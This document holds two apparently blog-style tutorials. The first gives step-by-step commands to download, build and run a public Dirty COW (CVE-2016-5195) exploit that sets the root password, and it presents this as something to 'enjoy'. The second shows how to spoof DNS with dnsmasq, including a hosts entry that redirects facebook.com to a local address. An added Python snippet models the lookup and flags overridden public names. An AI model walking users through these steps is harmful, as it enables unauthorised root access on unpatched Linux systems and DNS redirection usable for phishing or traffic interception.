How to exploit Dirty Cow Vulnerability?

“Dirty Cow” is a Linux local privilege escalation vulnerability that affects Linux kernels released since 2.6.22 (September 2007) up to October 2016. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism.

To exploit this vulnerability, follow these steps.

  1. Download the zip file from https://github.com/gbonacini/CVE-2016-5195 .
  2. Unzip the zip file.
  3. Open terminal in this directory.
  4. type >> make clean
  5. type >> make
  6. type >> ./dcow
  7. Now your root password is “dirtyCowFun”. To verify, type >> su and enter the password “dirtyCowFun”.

Screenshot is given below.

Enjoy !!!


How to create fake DNS with dnsmasq in Linux?

There can be many cases where you want to run your own DNS server to redirect some DNS requests to your own site. This article shows how to create a fake DNS server, i.e. spoof DNS responses, with a program called dnsmasq. You can install it on Linux with the following commands. On Kali it comes preinstalled.

  1. apt-get update
  2. apt-get install dnsmasq-base

Here 1. updates the package lists and 2. installs dnsmasq-base.

After installing dnsmasq, edit the file /etc/dnsmasq.conf (create it if it doesn’t exist) so that it contains the following lines.

  1. no-dhcp-interface=
  2. server=8.8.8.8
  3. no-hosts
  4. addn-hosts=/etc/dnsmasq.hosts

Here 2. configures dnsmasq to forward to 8.8.8.8 (Google Public DNS) whenever no record is found in the /etc/dnsmasq.hosts file; 3. stops dnsmasq from reading the system /etc/hosts, and 4. names /etc/dnsmasq.hosts as the custom hosts file for dnsmasq. You can add your own hosts files the same way.

So far we haven’t created the /etc/dnsmasq.hosts file, so create it and add some DNS entries as shown below.

  1. 192.168.0.1    www.router.my    router.my
  2. 192.168.0.2    www.facebook.com    facebook.com
  3. 192.168.0.3    www.mycustompageonnon80port.my

If you want one IP to point to multiple sites, list the hostnames on the same line separated by spaces. If you want to add a site that runs on a port other than 80, you just put the IP and hostname in the hosts file (DNS does not carry ports) and in the browser enter the URL as http://www.mycustompageonnon80port.my:1234.
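The lookup order the configuration above describes, as an added example that is not part of the original post: dnsmasq answers from the addn-hosts file first and forwards to the upstream server only when no entry matches. The hosts file content below is a constructed copy of the entries shown above; the upstream address is the one from the configuration.

```python
# Added example (not from the original post): a small model of the lookup
# order the dnsmasq configuration above describes. The addn-hosts file is
# consulted first; only names it does not list are forwarded upstream.
# overridden_names() is the check an administrator auditing such a resolver
# wants: which real Internet names does the local file shadow for every client?
from typing import Dict, List, Tuple

# Constructed sample of /etc/dnsmasq.hosts in hosts-file format.
SAMPLE_HOSTS_FILE = """\
# one IP may carry several names, separated by whitespace
192.168.0.1    www.router.my    router.my
192.168.0.2    www.facebook.com    facebook.com
192.168.0.3    www.mycustompageonnon80port.my
"""

UPSTREAM = "8.8.8.8"  # the server= line in /etc/dnsmasq.conf


def parse_hosts(text: str) -> Dict[str, str]:
    """Parse hosts-file text into {hostname (lowercase, no trailing dot): ip}.

    Blank lines and '#' comments are skipped; the first field of a line is
    the address and every following field is a name for that address.
    """
    table: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            table[name.lower().rstrip(".")] = ip
    return table


def resolve(name: str, table: Dict[str, str]) -> Tuple[str, str]:
    """Return ("local", ip) when the hosts file answers, else ("forward", UPSTREAM)."""
    ip = table.get(name.lower().rstrip("."))
    if ip is not None:
        return ("local", ip)
    return ("forward", UPSTREAM)


def overridden_names(table: Dict[str, str],
                     public_suffixes=(".com", ".net", ".org")) -> List[str]:
    """Names in the local table under a public TLD: entries that silently
    replace the real Internet answer for every client using this resolver."""
    return sorted(n for n in table if n.endswith(public_suffixes))
```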

Notice that some popular sites such as Facebook and Google will not be redirected to these IPs, as modern browsers use certificate pinning.

Now to start the dnsmasq server run the following commands.

  1. killall -g dnsmasq
  2. dnsmasq --no-daemon

Here 1. stops dnsmasq if it is currently running and 2. starts it. The --no-daemon flag keeps dnsmasq in the foreground instead of sending it to the background, so its log output stays visible in the terminal.